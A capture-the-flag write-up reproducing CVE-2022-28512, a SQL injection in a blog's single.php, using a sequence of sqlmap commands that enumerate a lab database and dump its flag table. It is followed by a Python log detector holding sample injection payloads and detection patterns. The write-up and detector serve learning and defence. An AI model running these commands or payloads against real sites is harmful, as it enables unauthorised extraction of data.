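CVE-2022-28512 Vulnerability Reproduction
Open the environment and visit eci-2ze483uhhb41le85czm2.cloudeci1.ichunqiu.com/single.php?id=1
An article is displayed. Manual UNION-based injection is possible here, but for speed and convenience we use sqlmap to perform the SQL injection. Note: no login or registration is required. First, enumerate the database names:
sqlmap -u "eci-2ze483uhhb41le85czm2.cloudeci1.ichunqiu.com/single.php?id=1" --dbs
The result is: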
available databases [4]:
[*] ctf
[*] information_schema
[*] mysql
[*] performance_schema
Next, enumerate the table names in the ctf database:
sqlmap -u "eci-2ze483uhhb41le85czm2.cloudeci1.ichunqiu.com/single.php?id=1" -D "ctf" --tables
The result is:
Database: ctf
[14 tables]
+-----------------------------+
| banner_posts |
| blog_categories |
| blogs |
| editors_choice |
| flag |
| links |
| membership_grouppermissions |
| membership_groups |
| membership_userpermissions |
| membership_userrecords |
| membership_users |
| page_hits |
| titles |
| visitor_info |
+-----------------------------+
Then we enumerate the column names of the flag table:
sqlmap -u "eci-2ze483uhhb41le85czm2.cloudeci1.ichunqiu.com/single.php?id=1" -D "ctf" -T "flag" --columns
The result is:
Database: ctf
Table: flag
[1 column]
+--------+---------------+
| Column | Type |
+--------+---------------+
| flag | varchar(1024) |
+--------+---------------+
Finally, dump the column contents to obtain the flag:
sqlmap -u "eci-2ze483uhhb41le85czm2.cloudeci1.ichunqiu.com/single.php?id=1" -D "ctf" -T "flag" -C "flag" --dump
With that, the flag is obtained!
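
From the defender's side, the enumeration above leaves a recognizable trail in the web server's access log. The following is an added example, not part of the original post: a small detector for suspicious values of the id parameter on single.php. The log lines are constructed, the rule names are hypothetical, and it assumes id is normally a plain integer.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); IPs, times and payloads are made up.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /single.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2024:10:00:03 +0000] "GET /single.php?id=1%27%20AND%20%271%27%3D%271 HTTP/1.1" 200 5120 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '203.0.113.9 - - [01/Jan/2024:10:00:04 +0000] "GET /single.php?id=-1%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20- HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /single.php?id=1%20AND%20(SELECT%20COUNT(*)%20FROM%20information_schema.tables)>0 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"')
# Hypothetical rule names; each regex is applied to the URL-decoded parameter value.
RULES = {
    "union-select": re.compile(r"\bunion\b.{0,20}\bselect\b", re.I | re.S),
    "schema-enumeration": re.compile(r"\binformation_schema\b", re.I),
    "quote-or-comment": re.compile(r"[\x27\x22]|--|#|/\*"),  # quotes or SQL comment markers
}

def inspect(line, page="/single.php", param="id"):
    """Return (client_ip, reasons) if the request to `page` looks like SQL injection, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, target, agent = m.groups()
    url = urlsplit(target)
    if url.path != page:
        return None
    reasons = set()
    if "sqlmap" in agent.lower():  # default sqlmap User-Agent; trivially changed, so only a hint
        reasons.add("sqlmap-user-agent")
    for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
        if not re.fullmatch(r"[0-9]+", value):  # assumption: a legitimate id is all digits
            reasons.add("non-integer-id")
        reasons.update(name for name, rx in RULES.items() if rx.search(value))
    return (ip, reasons) if reasons else None

def summarize(lines):
    """Group findings per client IP so one scanning source shows up as one entry."""
    hits = {}
    for line in lines:
        found = inspect(line)
        if found:
            hits.setdefault(found[0], set()).update(found[1])
    return {ip: sorted(reasons) for ip, reasons in hits.items()}

if __name__ == "__main__":
    for ip, reasons in summarize(SAMPLE_LOG).items():
        print(ip, ", ".join(reasons))
```

The non-integer check is the most robust signal here, since it does not depend on a particular payload or User-Agent; the same check enforced in the application, together with a parameterized query, removes the injection point itself.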